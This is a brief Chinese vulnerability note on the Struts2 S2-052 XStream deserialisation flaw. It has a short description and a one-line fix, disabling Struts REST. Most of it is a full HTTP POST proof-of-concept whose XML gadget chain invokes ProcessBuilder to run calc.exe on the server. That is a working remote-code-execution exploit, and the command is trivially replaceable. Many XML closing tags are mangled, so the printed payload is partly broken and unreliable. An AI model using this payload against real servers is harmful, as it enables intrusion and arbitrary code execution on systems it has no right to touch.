struts2-052漏洞

0x1 漏洞描述
当启用 Struts REST的XStream handler去反序列化处理一个没有经过任何类型过滤的XStream的实例，可能导致在处理XML时造成远程代码执行漏洞。

0x2 漏洞利用

0x3 漏洞poc(网上找的)

POST /struts2-rest-showcase/orders/3;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7 HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/xml
Content-Length: 1646
Referer: http://127.0.0.1:8080/struts2-rest-showcase/orders/3/edit
Cookie: JSESSIONID=A82EAA2857A1FFAF61FF24A1FBB4A3C7
Connection: close
Upgrade-Insecure-Requests: 1

<map> 
<entry> 
<jdk.nashorn.internal.objects.NativeString> <flags>0flags> <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"> <dataHandler> <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"> <is class="javax.crypto.CipherInputStream"> <cipher class="javax.crypto.NullCipher"> <initialized>falseinitialized> <opmode>0opmode> <serviceIterator class="javax.imageio.spi.FilterIterator"> <iter class="javax.imageio.spi.FilterIterator"> <iter class="java.util.Collections$EmptyIterator"/> <next class="java.lang.ProcessBuilder"> <command> <string>C:\Windows\System32\calc.exestring> command> <redirectErrorStream>falseredirectErrorStream> next> iter> <filter class="javax.imageio.ImageIO$ContainsFilter"> <method> <class>java.lang.ProcessBuilderclass> <name>startname> <parameter-types/> method> <name>fooname> filter> <next class="string">foonext> serviceIterator> <lock/> cipher> <input class="java.lang.ProcessBuilder$NullInputStream"/> <ibuffer>ibuffer> <done>falsedone> <ostart>0ostart> <ofinish>0ofinish> <closed>falseclosed> is> <consumed>falseconsumed> dataSource> <transferFlavors/> dataHandler> <dataLen>0dataLen> value> jdk.nashorn.internal.objects.NativeString> <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/> entry> <entry> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/> 
entry> 
map>

0x4 修复建议
禁用Struts REST